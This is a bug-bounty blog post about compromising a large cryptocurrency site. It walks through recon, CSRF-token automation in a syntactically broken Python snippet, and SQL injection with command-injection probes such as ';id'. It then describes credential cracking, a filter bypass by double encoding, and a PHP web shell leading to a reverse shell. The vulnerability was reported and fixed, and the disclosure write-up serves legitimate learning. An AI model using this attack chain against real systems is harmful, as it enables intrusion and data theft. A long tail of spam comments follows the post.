How we hacked one of the worlds largest Cryptocurrency Website

Bug Bounty

One of the world’s largest cryptocurrency site was hacked by the Strynx team to find a flaw exposing multiple vulnerabilities that could to lead loss of millions of dollars. One of the team members shared his point of view on how we discovered such a critical issue involving data of millions of users.

Here’s on how we discovered it:

The testing began in two phases: Manual and Automated Recon.

The main purpose was for the discovery of an HTTP API, that could be accessed and exploited via a few commands. Manual recon is always preferred is because it allows people to be independent of different scripts and tools. Automated tools make things simple but consume a lot of time and throw out a lot of false positives. Whereas Manual Recon eliminates the possibilities of false positives and discovers issues much faster.

To begin, the website was behind Cloudflare. There are various methods on retrieving the actual server IP but Censys is generally preferred. Fast and accurate results make the recon process much faster. There are various tools used for automated recon and Censys is one of the best one to use. We’ll deep dive into some of these tools in the next blog. After obtaining the IP, port scanning was performed. Nmap was used to discover all open ports and services which could be potentially used to potentially take over the server or cause harm to the company. No special posts were found except for the port 443 used for website. The website was blockchain-based and It is always assumed that sites dealing with blockchain as usually secure and no harm can be done. But this is not the case here. A way is shown down how this server was exploited by using various methodologies including exploiting and chaining various issues.

On exploring the website, it was seen that each of the requests in the site was accompanied by a CSRF Token. For those who don’t know what a CSRF token is, it is a unique secret which has an unpredictable value that is generated server-side such that It cannot be guessed by users who make scripts which send a request on behalf of the target user. It is similar to a captcha which changes for every request. It was observed that there was an endpoint which was called to generate the CSRF Token. Thus, to automate the process of manually inserting new CSRF Token, A python script was developed. If you want to know how it was done, refer to this link: https://stackoverflow.com/questions/13567507/passing-csrftoken-with-python-requests. And it was time to deep dive.

Here is a short code snippet we used:

from cmd import cmd
import requests
from bs4 import BeautifulSoup

class Terminal(Cmd):
prompt = '>'

def __init__(self):
url = "url"
header = {}
cookies = {"PHPSESSID": "a1sw4s4e7s4s55w6s6sw8s5q2a"}

respose = requests.get(url, header=header, cookies=cookies)
soup = BeautifulSoup(respose.text, 'html.parser')
self.token = soup.find ('input', {'name': 'token'}) {'value'}
Cmd.__init__(self)

def default(self, args)
cmd = agrs
injection = "example" + cmd
print = (injection)
url = "example.coin"

header = {}
cookies = {"PHPSESSID": "a1sw4s4e7s4s55w6s6sw8s5q2a"}
data = {

"username" : "b"
"password" : "a"
"db" : "injection"
"token" : self.token,
"login" : ""
}


respose = requests.post(url, header=header, cookies=cookies, data=data)
soup = BeautifulSoup(respose.text, 'html.parser')

print(respose.text)
if "PDOException" not in respose.text
self.token = soup.find('input'. {'name' : 'token'}) ['value']

trminal = Terminal()
trminal.cmdloop()

The next thing was to look for hidden directories and paths of the webserver. Using tools like dirbuster and gobuster can be used. Along with this, a wordlist was used to enumerate. As rockyou4.txt and directory-list-2.3-*.txt are very well known, a wordlist was prepared with unknown terms. Usually, the wordlists are known to developers and Pen-testers, hence another one was made. The main focus would be to search for JS files with the help of jQuery. Different methods were also used to enumerate hidden files, but we’ll leave that for later on. After this, Burp was used to analyse all the requests. Various POST requests were observed to look out for any issues. Various Parameters were tampered to check the functionality of the site and how database connection is used. Turns out there was a lack of error protection in the site which leaked data when certain parameters were being tampered.

Protip#- Always tamper data to look out for any loopholes. Suppose the value of a parameter is 0, make it 1 to see what happens. Always contradict values of parameters to look out for any loopholes.

On analysing the server (looking into JS files and the error messages) multiple occurrences of hidden parameters were found along with some sensitive information of the internal functions used by the website. These functions helped the site to give more user experience but turned out to be the worst nightmare. Various types of injections did work but we will focus on one of these in much depth. On observing the communications, it was noted that the application did accept some SQL special elements. Thus, it was time to search for SQL Injections. On testing one of the hidden parameters, it was observed that there was an error based SQLi. The working of the parameter wasn’t understood at it wasn’t making any observable changes on the page. Although, the parameter still made calls to the database. Hence it was maybe some functionality which was used for testing but the code wasn’t removed after sending the site to production.  

PDO Exception #1
PDO Exception #2

Here are some of the PDO Exceptions we found. If you don’t know what PDO Exceptions are stay tuned for upcoming blogs. We would write about this in the blogs such that if you find exceptions of this kind, you will learn how to exploit it.

An example of a hidden parameter would be as:

Suppose in JS Files, something like document.getElementById(‘id’) is mentioned. If the JS file is called to some Html page, the parameter can be called from the URL as: example.com/index.php?Id=somevalue. Thus, in some other ways including this, hidden parameters can be found.

The parameter was also tampered to search for code injections such as ‘;id’ or ‘;pwd’ to see if these values delivered any output or throw some error which can be useful for us in understanding the application. But this didn’t work so the next step was to exploit the SQLi found before.

There are various methods to find or exploit SQLi, for that, you can refer to any cheat sheets available online, as too much content is to be delivered. If another blog is needed for this please write in the comments so that we can blog about it later on. Various data from the database was extracted and the juiciest credentials were the database login credentials. If you know, the credentials are usually hashed by default, hence the next job was trying to decrypt these hashes. The hashes were decrypted easily as it was using one common password from public wordlists. It was like Ummm… Such critical site such less protection.

Ok, we got SQL access. What next?

It’s time for RCE.

If you know, after getting SQL remote access to the database, it is possible to upload a PHP shell if the database had executable permissions. To a surprise it did. It was possible to upload a shell to var/www/html directory which created a PHP shell in the root directory of the website. But this wasn’t as easy.

Hurdles don’t ever stop

Turns out there was a filter on the parameter searching out for tags. (XSS Prevention :P). This was bypassed by using double encoding which allowed malicious PHP files to be uploaded on the system. For those who don’t know about how to get a shell from SQLi, please try out Sqlmap to learn about this more. SQLmap does have a function which allows us to get a PHP shell on the webserver. It checks if it has permissions to upload to the web directories and creates a PHP file, which when opened, has options to upload our malicious web shells to the server. From the web shell, we were able to get a reverse shell to the system and hence RCE!

After this, the report was submitted using screenshots and proper POC via secure channels. Within one hour a reply was obtained back acknowledging the report and asking to provide personal details to receive a bounty. To my surprise, a 5-digit bounty was rewarded by the company for this effort. Appreciate the response and the fix time for the company as it was fixed in just 2 hours. Everything from the error codes to the database names was fixed in no time. Kudos to the company!

Please leave down any comments or any suggestions for this blog and any further blogs which you would like to read. We provide services to companies who would like their products to be tested. If you’re a company who wants us to perform complete testing of your site, please use the Contact Us page to drop a message or info(at)strynx.org. We would try to reply at the earliest.

54 thoughts on “How we hacked one of the worlds largest Cryptocurrency Website”

  1. Nick December 24, 2019 8:40 pm

    the write-up is much much better than other I attended. Admin shows only those vulnerabilities that are truly exploitative and no any rubbishy 🙂 its superb! Heads up🙌🙌🙌🙌

  2. cichy-marzyciel.tumblr.com December 25, 2019 3:37 pm

    Pretty great post. I simply stumbled upon your blog and wanted to say that I’ve really enjoyed surfing around
    your blog posts. After all I will be subscribing ffor yokur rss feed annd I’m hoping yyou write
    once more soon!

  3. kiet giang melbourne December 25, 2019 6:30 pm

    hi!,I really like your writing so so much! proportion we
    communicate extra about your article on AOL? I require an expert in this space to unravel my problem.
    May be that’s you! Looking forward to look you.

  4. https://hangtalan-szavakkal.tumblr.com December 25, 2019 11:00 pm

    Wow, this article is nice, my younger sister is analyzing such things, thnus I am
    going to let know her.

  5. agencia digital December 26, 2019 4:53 am

    Porém não só de net vive Marketing Digital.

  6. Cách tự vệ sinh máy lạnh Panasonic December 28, 2019 1:47 am

    Mặt nạ là phần đầu tiên khi bạn vệ sinh máy. http://www.qhnbld.com/UserProfile/tabid/57/userId/12666936/Default.aspx

  7. kiet giang December 28, 2019 6:17 am

    Hi there, its fastidious piece of writing regarding media print, we all understand media is a wonderful source of information.

  8. Yunus Ahmed January 2, 2020 12:25 pm

    it would be great if you elaborate/explain the steps you took to Xploit SQLi and RCE. After all exploiting steps are main part in hacking.

  9. Frank January 9, 2020 10:13 pm

    If some one wants to bbe upfated with hottest technologies after that he musst be
    paay a visit this web page and be up to date efery day.

  10. buy credit card January 10, 2020 2:16 am

    Ԍreat goods fгom you, man. I hаvе understand yoᥙr stuff
    previous tօ and yⲟu are just toⲟ grеat. I really like wwhat y᧐u’ve acquired һere, cеrtainly ⅼike
    wһat yoս ɑre stating annd tһe way iin ѡhich
    ʏou saу іt. Y᧐u mаke іt enjoyable and you ѕtill care for to keep iit ѕensible.
    I can’t waijt to reаd far mⲟгe from y᧐u. Тhis is
    actuaⅼly a gгeat website.

  11. 31337$ January 15, 2020 7:34 pm

    Bounty is 31337$ thats great keep it going dude

  12. Edwardo January 16, 2020 9:48 pm

    What’s uup to all, it’s genuinely a pleasant for me too go to see this website,
    it includes priceless Information.

  13. pizza in provo utah January 27, 2020 10:44 pm

    Hey there! I just wanted to ask if you ever have any problems with hackers?
    My last blog (wordpress) was hacked and I ended up losing a
    few months of hard work due to no backup. Do you have any solutions to stop hackers?

  14. vach ngan ve sinh January 29, 2020 7:25 am

    It’s truly very difficult in this full of activity life to listen news on Television, thus I simply use
    web for that reason, and get the latest news.

  15. Jerri February 1, 2020 3:41 pm

    Someone necessarily lend a hand to make critically articles I might state.
    That is the first time I frequented your web page and up to now?
    I amazed with the analysis you made to create this actual put up amazing.
    Wonderful process!

  16. Kabeltrommelregal February 3, 2020 11:31 am

    Right away I am going to do my breakfast, after having my breakfast coming over
    again to read further news.

  17. 군포카지노 룰렛 게임 February 5, 2020 8:27 am

    Have you ever considered creating an ebook or guest authoring on other websites?

    I have a blog based on the same topics you discuss and would really like to have you share some stories/information. I know
    my viewers would appreciate your work. If you’re even remotely interested, feel free to shoot me
    an e mail.

  18. 충정로도박 합법 국가 February 5, 2020 8:44 am

    I think what you composed was very reasonable. However, think about this,
    what if you wrote a catchier post title? I am not saying
    your information is not solid, however suppose you added a post title that makes people desire more?
    I mean How we hacked one of the worlds largest Cryptocurrency Website
    – Strynx is a little plain. You could look at Yahoo’s front
    page and watch how they create post titles to grab people interested.
    You might add a video or a related picture or two to grab people excited about what you’ve written. In my opinion, it could make your website a little livelier.

  19. 강릉카지노 종류 February 5, 2020 8:44 am

    I am genuinely grateful to the owner of this web page who has
    shared this enormous paragraph at at this place.

  20. 서울바카라 계산기 February 5, 2020 8:50 am

    Nice post. I learn something new and challenging on websites I stumbleupon everyday.
    It will always be useful to read articles from other
    writers and practice something from other websites.

  21. 거제카지노 룰렛 February 5, 2020 8:53 am

    At this time it seems like Drupal is the preferred blogging platform out there
    right now. (from what I’ve read) Is that what you are using on your blog?

  22. faservco.com February 5, 2020 8:59 am

    It’s really very difficult in this full of activity life to listen news on Television,
    therefore I only use web for that purpose, and get the most up-to-date
    news.

  23. morning.rocks February 5, 2020 9:04 am

    Hey would you mind letting me know which webhost you’re
    using? I’ve loaded your blog in 3 completely different internet browsers and I must say this blog loads a lot faster then most.
    Can you suggest a good web hosting provider at a fair price?
    Thanks, I appreciate it!

  24. 전주릴 게임 신천지 February 5, 2020 9:09 am

    What a material of un-ambiguity and preserveness of precious
    knowledge concerning unpredicted feelings.

  25. www.robotshow360.com February 5, 2020 9:11 am

    great issues altogether, you simply won a new reader. What might you suggest in regards to
    your publish that you simply made some days ago?
    Any sure?

  26. 해외 스포츠 사이트오락실 슬롯 머신 게임 February 5, 2020 9:12 am

    Aw, this was an extremely nice post. Spending some time and actual effort to generate
    a superb article… but what can I say… I hesitate a whole lot and never manage to get anything done.

  27. 합정오바마카지노 February 5, 2020 9:17 am

    Pretty! This has been a really wonderful post. Thank you
    for providing these details.

  28. 울산정선 카지노 게임 종류 February 5, 2020 9:17 am

    It is appropriate time to make some plans for the longer term
    and it’s time to be happy. I have learn this publish and if I could I desire to suggest you few attention-grabbing things or suggestions.
    Perhaps you could write subsequent articles referring to this article.
    I wish to learn even more things approximately it!

  29. www.united-el.com February 5, 2020 9:19 am

    It’s actually a great and useful piece of information. I’m glad that you simply shared this useful information with us.

    Please stay us up to date like this. Thanks for sharing.

  30. blog1projekt.ct8.pl February 5, 2020 9:20 am

    It’s very easy to find out any matter on web as compared to books, as
    I found this piece of writing at this site.

  31. 군산트럼프 카드 게임 종류 February 5, 2020 9:20 am

    You’re so cool! I don’t suppose I have read through something like
    this before. So great to discover someone with some original thoughts on this subject.
    Seriously.. thanks for starting this up. This website is something that’s needed on the internet, someone with a little originality!

  32. blpefilm.com February 5, 2020 9:26 am

    Hi, its good article concerning media print, we all be aware
    of media is a enormous source of facts.

  33. 동탄놀이터 먹튀 February 5, 2020 9:36 am

    Every weekend i used to pay a visit this site, for the reason that i wish for enjoyment, for the reason that
    this this web page conations actually good funny information too.

  34. www.kzp.co.com February 5, 2020 9:45 am

    You really make it seem so easy with your presentation but I
    to find this topic to be really one thing which I believe I might
    by no means understand. It sort of feels too complex and very large for me.
    I am taking a look ahead on your subsequent put up, I will try to get the dangle of
    it!

  35. 안양릴 게임 야마토 February 5, 2020 9:48 am

    I was more than happy to find this site. I want to to thank
    you for your time due to this wonderful read!! I definitely appreciated every little bit of it and i
    also have you book-marked to see new things on your website.

  36. 양평카지노 썰 February 5, 2020 9:51 am

    Hello mates, pleasant article and good urging commented here, I am really enjoying by these.

  37. sv1217.sspu-opava.cz February 5, 2020 9:54 am

    When some one searches for his vital thing, therefore he/she wants to
    be available that in detail, thus that thing is maintained over here.

  38. 토토 생중계카지노 슬롯머신 종류 February 5, 2020 9:54 am

    This paragraph will help the internet viewers for setting up new website or even a weblog from start
    to end.

  39. www.les-maldives.org February 5, 2020 9:59 am

    If you are going for best contents like I do, only go to see this website everyday
    because it offers quality contents, thanks

  40. 화성썬 시티 February 5, 2020 10:00 am

    진해바카라 배팅법
    진해바카라 배팅법
    진해바카라 배팅법
    의정부솔레어카지노
    I have been surfing online more than 3 hours today, yet I
    never found any interesting article like yours. It’s pretty worth enough
    for me. In my view, if all webmasters and bloggers made good content as you did,
    the net will be a lot more useful than ever before.

  41. 영덕카지노 가입 February 5, 2020 10:04 am

    Hello There. I found your blog using msn. This is an extremely
    smartly written article. I will make sure to bookmark it
    and come back to learn extra of your helpful information. Thank you for the post.
    I will certainly comeback.

  42. 남양주카지노 홍보 February 5, 2020 10:12 am

    you’re in reality a just right webmaster. The website loading pace is amazing.

    It sort of feels that you’re doing any unique trick.

    Furthermore, The contents are masterwork. you have performed
    a fantastic activity on this matter!

  43. 당진베트맨 February 5, 2020 10:13 am

    Hi! Do you know if they make any plugins to help with Search
    Engine Optimization? I’m trying to get my blog to rank for
    some targeted keywords but I’m not seeing very good gains.
    If you know of any please share. Appreciate it!

  44. 군산바카라 게임 다운로드 February 5, 2020 10:41 am

    Hmm is anyone else encountering problems with the images on this
    blog loading? I’m trying to figure out if its a problem on my end or if it’s the blog.

    Any responses would be greatly appreciated.

  45. 구리더나인카지노 February 5, 2020 10:45 am

    After looking into a few of the articles on your website, I honestly like
    your way of blogging. I added it to my bookmark website
    list and will be checking back in the near future.
    Please visit my website too and let me know how you feel.

  46. 진주카지노 조작 February 5, 2020 10:45 am

    Hello, i read your blog from time to time and i own a similar one and i was just curious if you get a lot of spam remarks?
    If so how do you reduce it, any plugin or anything you can recommend?

    I get so much lately it’s driving me insane so any help
    is very much appreciated.

  47. 김제마카오 mgm 카지노 February 5, 2020 11:11 am

    Hey There. I found your weblog the usage of msn. This is
    a very smartly written article. I will make sure to bookmark it
    and return to learn extra of your helpful information. Thank you for the post.
    I’ll definitely return.

  48. 진천바카라 수익 February 5, 2020 11:12 am

    Hey there! I’ve been reading your web site for a long time now and finally got the courage to go ahead and
    give you a shout out from New Caney Tx! Just wanted to mention keep up the good work!

  49. porn hd gif February 6, 2020 4:09 pm

    I always used to read piece of writing in news papers but
    now as I am a user of net therefore from now I am using net for content,
    thanks to web.

  50. Protein Of Hydrolyzed Collagen Peptides February 6, 2020 5:12 pm

    Hello would you mind sharing which blog platform you’re using?

    I’m planning to start my own blog in the near future but I’m having a hard time
    deciding between BlogEngine/Wordpress/B2evolution and Drupal.

    The reason I ask is because your design and style
    seems different then most blogs and I’m looking
    for something completely unique. P.S Sorry for getting off-topic but I had to ask!

  51. girls naked on webcam February 6, 2020 5:54 pm

    I’m extremely impressed together with your writing talents
    as neatly as with the structure on your weblog.
    Is this a paid subject matter or did you modify it yourself?

    Anyway stay up the excellent quality writing, it is rare to see a nice blog like this one these days..

  52. Addie February 6, 2020 6:17 pm

    There is certainly a great deal to know about this subject.
    I like all the points you’ve made.

  53. Personal Trainer February 6, 2020 6:18 pm

    Hello mates, its fantastic paragraph about tutoringand completely defined, keep it up all the time.

  54. health and wellness February 6, 2020 7:16 pm

    WOW just what I was searching for. Came here by searching for ways
    to make money online

Post a Comment

Your email address will not be published. Required fields are marked *

*